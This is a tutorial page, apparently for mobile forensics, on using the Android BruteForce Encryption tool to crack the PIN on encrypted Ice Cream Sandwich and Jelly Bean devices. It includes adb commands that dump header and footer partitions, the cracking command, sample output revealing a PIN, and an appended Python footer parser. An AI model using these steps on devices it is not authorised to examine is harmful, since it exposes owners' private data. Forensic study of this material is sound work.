Android BruteForce Encryption


Android BruteForce Encryption is used to crack the PIN that encrypts an Android device (Ice Cream Sandwich and Jelly Bean) by brute force.



android-bruteforce-encryption [header file] [footer file] (max PIN digits)


Boot to a recovery image

Next, we’ll boot the device from a rooted recovery image. For this guide, we used Clockwork Mod, but you can use any device-compatible recovery image with root and adb enabled.

Pull the required header and footer files

Your device should now be sitting in recovery mode. Next, we are going to pull the header and footer data needed to brute force the encryption PIN. The location varies by device, so choose the steps for your particular device type.

Nexus S


cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p2 of=tmp_header bs=512 count=1
cyborg@cyborg:~$ sudo adb pull tmp_header ~/Desktop/tmp_header



cyborg@cyborg:~$ sudo adb shell mkdir /efs
cyborg@cyborg:~$ sudo adb shell mount -t yaffs2 /dev/block/mtdblock6 /efs
cyborg@cyborg:~$ sudo adb pull /efs/userdata_footer ~/Desktop/tmp_footer


Galaxy Nexus


cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p12 of=tmp_header bs=512 count=1
cyborg@cyborg:~$ sudo adb pull tmp_header ~/Desktop/tmp_header



cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p13 of=tmp_footer
cyborg@cyborg:~$ sudo adb pull tmp_footer ~/Desktop/tmp_footer

Run the Android BruteForce Encryption program:

We now have everything we need, so we’ll run the Android BruteForce Encryption cracking program against the header and footer files. By default, it tests 4-digit numeric passcodes, but you can change the number of digits to test.

cyborg@cyborg:~$ sudo android-bruteforce-encryption ~/Desktop/tmp_header ~/Desktop/tmp_footer

The Android BruteForce Encryption program will output information about the footer file and then brute force the password:

Defaulting max PIN digits to 4
Footer File    : /home/santoku/Desktop/tmp_footer
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 0
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0xE51861649D0005F874AD6CCAB6DF2C61
Salt           : 0xA163525990AC7A053E1E372914999BE8
Android BruteForce Encryption  Trying to Bruteforce Password... please wait
Trying: 0000
Trying: 0001
Trying: 0002
Trying: 0003

Trying: 6426
Trying: 6427
Trying: 6428
Found PIN!: 6428
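The footer fields printed above can be checked independently before the tool is run, which catches a pull from the wrong partition or a truncated file. The parser below is an added example, not code from this page or from the tool. The field layout, the 32-byte gap between key and salt, and the names parse_footer and build_sample are assumptions based on the Android 4.x crypto footer structure. The sample footer is constructed from the values in the output above.

```python
import struct

CRYPT_MNT_MAGIC = 0xD0B5B1C4   # magic value shown in the tool output above
# Assumed layout (Android 4.x crypt_mnt_ftr, little-endian): magic, major,
# minor, ftr_size, flags, keysize (bytes), spare, fs_size, failed decrypts,
# 64-byte crypto type name.
FIXED = struct.Struct("<IHHIIIIQI64s")
KEY_TO_SALT_PADDING = 32       # assumed gap between encrypted key and salt
SALT_LEN = 16


def parse_footer(blob):
    """Return the footer fields as a dict, or raise ValueError if invalid."""
    if len(blob) < FIXED.size:
        raise ValueError("file too short to hold a crypto footer")
    (magic, major, minor, ftr_size, flags, keysize,
     _spare, _fs_size, failed, ctype) = FIXED.unpack_from(blob, 0)
    if magic != CRYPT_MNT_MAGIC:
        raise ValueError("bad magic 0x%08X: wrong partition or not encrypted" % magic)
    if ftr_size < FIXED.size or keysize not in (16, 24, 32):
        raise ValueError("implausible footer size or key size")
    salt_off = ftr_size + keysize + KEY_TO_SALT_PADDING
    if len(blob) < salt_off + SALT_LEN:
        raise ValueError("footer truncated before the salt")
    return {
        "version": (major, minor),
        "footer_size": ftr_size,
        "flags": flags,
        "key_bits": keysize * 8,
        "failed_decrypts": failed,
        "crypto_type": ctype.split(b"\0", 1)[0].decode("ascii", "replace"),
        "encrypted_key": blob[ftr_size:ftr_size + keysize].hex().upper(),
        "salt": blob[salt_off:salt_off + SALT_LEN].hex().upper(),
    }


def build_sample():
    """Constructed footer that reuses the values printed in the output above."""
    fixed = FIXED.pack(CRYPT_MNT_MAGIC, 1, 0, 104, 0, 16, 0, 0, 0,
                       b"aes-cbc-essiv:sha256")
    key = bytes.fromhex("E51861649D0005F874AD6CCAB6DF2C61")
    salt = bytes.fromhex("A163525990AC7A053E1E372914999BE8")
    return fixed.ljust(104, b"\0") + key + bytes(KEY_TO_SALT_PADDING) + salt


if __name__ == "__main__":
    for name, value in parse_footer(build_sample()).items():
        print("%-16s: %s" % (name, value))
```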

©2018 Ztrela Knowledge Solutions Pvt. Ltd